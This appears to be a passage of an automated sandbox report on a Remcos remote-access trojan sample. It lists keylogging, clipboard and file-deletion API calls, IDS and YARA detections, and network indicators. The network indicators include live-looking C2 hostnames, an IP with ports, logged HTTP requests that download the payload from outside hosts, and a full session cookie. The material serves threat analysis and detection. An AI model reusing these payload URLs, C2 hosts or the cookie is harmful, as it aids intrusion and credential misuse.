Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00419B86
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040BD72
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0781F616 FindFirstFileExA,15_2_0781F616
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_077D9564 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_077D9564
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_077D8594 FindFirstFileW,FindNextFileW,15_2_077D8594
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_077DA3BD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_077DA3BD
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_077ED03F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_077ED03F
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_077DD0A5 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_077DD0A5
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_077D9FAB __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_077D9FAB
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_077DCA8F FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_077DCA8F
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_077EA8A3 FindFirstFileW,15_2_077EA8A3
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_077DC888 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_077DC888
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_29137CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_29137CD2

              Networking

              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49763 -> 103.186.117.159:56796
              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49813 -> 103.186.117.159:13939
              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49823 -> 103.186.117.159:56796
              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49824 -> 103.186.117.159:13939
              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49825 -> 103.186.117.159:56796
              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49826 -> 103.186.117.159:13939
              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49827 -> 103.186.117.159:56796
              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49830 -> 103.186.117.159:13939
              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49829 -> 103.186.117.159:56796
              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49828 -> 103.186.117.159:13939
              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49831 -> 103.186.117.159:56796
              Source: Malware configuration extractor | URLs: https://alfanar01-my.sharepoint.com/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKcC8bPaqfGiqmGYrLTf6w?e=8qbxqz&download=1
              Source: Malware configuration extractor | URLs: https://lightstone.ae/image/233_Selebzihtih
              Source: Malware configuration extractor | URLs: pentester0.accesscam.org
              Source: Malware configuration extractor | URLs: archived.zapto.org
              Source: Malware configuration extractor | URLs: honeypotresearchteam.duckdns.org
              Source: global traffic | TCP traffic: 103.186.117.159 ports 5,6,7,56796,13939,9
              Source: unknown | DNS query: name: honeypotresearchteam.duckdns.org
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: 0_2_02C6E4B8 InternetCheckConnectionA,0_2_02C6E4B8
              Source: global traffic | TCP traffic: 192.168.2.9:49763 -> 103.186.117.159:56796
              Source: Joe Sandbox View | IP Address: 13.107.136.10
              Source: Joe Sandbox View | ASN Name: CENTURYLINK-US-LEGACY-QWESTUS
              Source: Joe Sandbox View | ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
              Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49723 -> 13.107.136.10:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49746 -> 162.19.139.102:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49729 -> 13.107.136.10:443
              Source: global traffic | HTTP traffic detected:
                  GET /:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKcC8bPaqfGiqmGYrLTf6w?e=8qbxqz&download=1 HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: alfanar01-my.sharepoint.com
              Source: global traffic | HTTP traffic detected:
                  GET /personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1 HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: alfanar01-my.sharepoint.com
                  Cookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjEzLDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uI2Q3NzQ2ZGY2NmVlODk4Nzc5MTI0YzAxMTEwNWZkZTJlZTgyZTI3NTUzNGMwNmMyMjBiOWNlZjQyNGMxNzNjMzAsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jZDc3NDZkZjY2ZWU4OTg3NzkxMjRjMDExMTA1ZmRlMmVlODJlMjc1NTM0YzA2YzIyMGI5Y2VmNDI0YzE3M2MzMCwxMzM3NzA3OTAzNDAwMDAwMDAsMCwxMzM3NzE2NTEzNDk3ODEzMTksMC4wLjAuMCwyNTgsOTE3NDIwNjMtZmNjYy00Y2JhLWIzNGItNjliZTU0ZTQ4NGU4LCwsZDE5NzY3YTEtNzBmOS1hMDAwLTcwZGMtNmI4OGUwYmM1NThkLGQxOTc2N2ExLTcwZjktYTAwMC03MGRjLTZiODhlMGJjNTU4ZCxMMEhrZGdUY3pVcTFOaGcwM2VZM2ZRLDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCwxODk3NDksdVhlaFFKUGxlVmpOQ2Jha1VoR0Q2SXlGUVFrLGlQNFZYR2cwTkFVRFJwaHJxS0ZTK1ZDM3RFT0dkTnVqeWhZaGRkNm4yMVJqVUxIYjVQUE9QQkY3SkgyczF3cWZtU0RrTWQzanV2My82RzlEWTRrdE9vbzQ0VnAvb085WE1iL2ExSnBJWVBieHFab3Z4bm9tSk5YVWYwK0Vwd3VHU2pzOEROSitPOExnUGlYeGtYV2hLMGY0YTNpZXRqOUJNTWJTWXJiYXBJc0pMZEk0YlI2MXhFZjhvK242TmJZM0s0VmNXOEJ0Sk5MZzhpZEJIQVdFOVlFZVhKY3pZMk1OQkpHcElMRzcvczFRODVla09MUVVacjA5TmlnOUY4YlIxRi9FN1lQV1NZcmxEeHBjK0hwTVlnYkZ6cEREQjQyQnZBTnRhRUt0MEhTSS9CRElRMXg2Y2VHZ0EyQ29qTkhCOHhoVjJ2TzFOOVltaWdoSDVuZFZuUT09PC9TUD4=
              Source: global traffic | HTTP traffic detected:
                  GET /image/233_Selebzihtih HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                  Host: lightstone.ae
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_29156D42 recv,8_2_29156D42
              Source: global traffic | DNS traffic detected: DNS query: alfanar01-my.sharepoint.com
              Source: global traffic | DNS traffic detected: DNS query: lightstone.ae
              Source: global traffic | DNS traffic detected: DNS query: pentester0.accesscam.org
              Source: global traffic | DNS traffic detected: DNS query: archived.zapto.org
              Source: global traffic | DNS traffic detected: DNS query: honeypotresearchteam.duckdns.org
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: SndVol.exe, colorcpl.exe | String found in binary or memory: http://geoplugin.net/json.gp
              Source: SndVol.exe, 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
              Source: jlPBMMQbXC.exe, Selebzih.PIF.7.dr | String found in binary or memory: http://hydros.8k.com
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0C
              Source: jlPBMMQbXC.exe, jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1638986421.000000007FB20000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.pmail.com
              Source: jlPBMMQbXC.exe, 00000000.00000003.1491122017.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1575706420.00000000007CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://alfanar01-my.sharepoint.com/
              Source: jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000DA69000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://alfanar01-my.sharepoint.com/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlK
              Source: jlPBMMQbXC.exe, 00000000.00000003.1491122017.00000000007E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://alfanar01-my.sharepoint.com/personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1Z
              Source: jlPBMMQbXC.exe, 00000000.00000002.1575706420.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1491122017.00000000007E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://alfanar01-my.sharepoint.com:443/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQ
              Source: jlPBMMQbXC.exe, 00000000.00000002.1575706420.0000000000834000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lightstone.ae/
              Source: jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000DAA3000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000DA69000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://lightstone.ae/image/233_Selebzihtih
              Source: jlPBMMQbXC.exe, 00000000.00000002.1575706420.000000000077E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lightstone.ae/image/233_Selebzihtihv
              Source: jlPBMMQbXC.exe, 00000000.00000002.1575706420.0000000000802000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lightstone.ae:443/image/233_SelebzihtihzOEROSitPOExnUGlYeGtYV2hLMGY0YTNpZXRqOUJNTWJTWXJiYXBJ
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
              Source: jlPBMMQbXC.exe, 00000000.00000003.1491083792.000000000083E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://spo.nel.measure.office.net/api/report?tenantId=91742063-fccc-4cba-b34b-69be54e484e8&desusert
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknown | HTTPS traffic detected: 13.107.136.10:443 -> 192.168.2.9:49723 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 162.19.139.102:443 -> 192.168.2.9:49746 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_2913A2F3 SetWindowsHookExA 0000000D,2913A2DF,00000000 8_2_2913A2F3
              Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_2914697B OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_2914697B
              Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_291468FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_291468FC
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_004168FC
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_077E7619 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_077E7619
              Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_2913A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,8_2_2913A41B
              Source: Yara match | File source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR

              E-Banking Fraud

              Source: Yara match | File source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_2914CA73 SystemParametersInfoW,8_2_2914CA73
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0041CA73 SystemParametersInfoW,15_2_0041CA73
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_077ED790 SystemParametersInfoW,15_2_077ED790

              System Summary

              Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
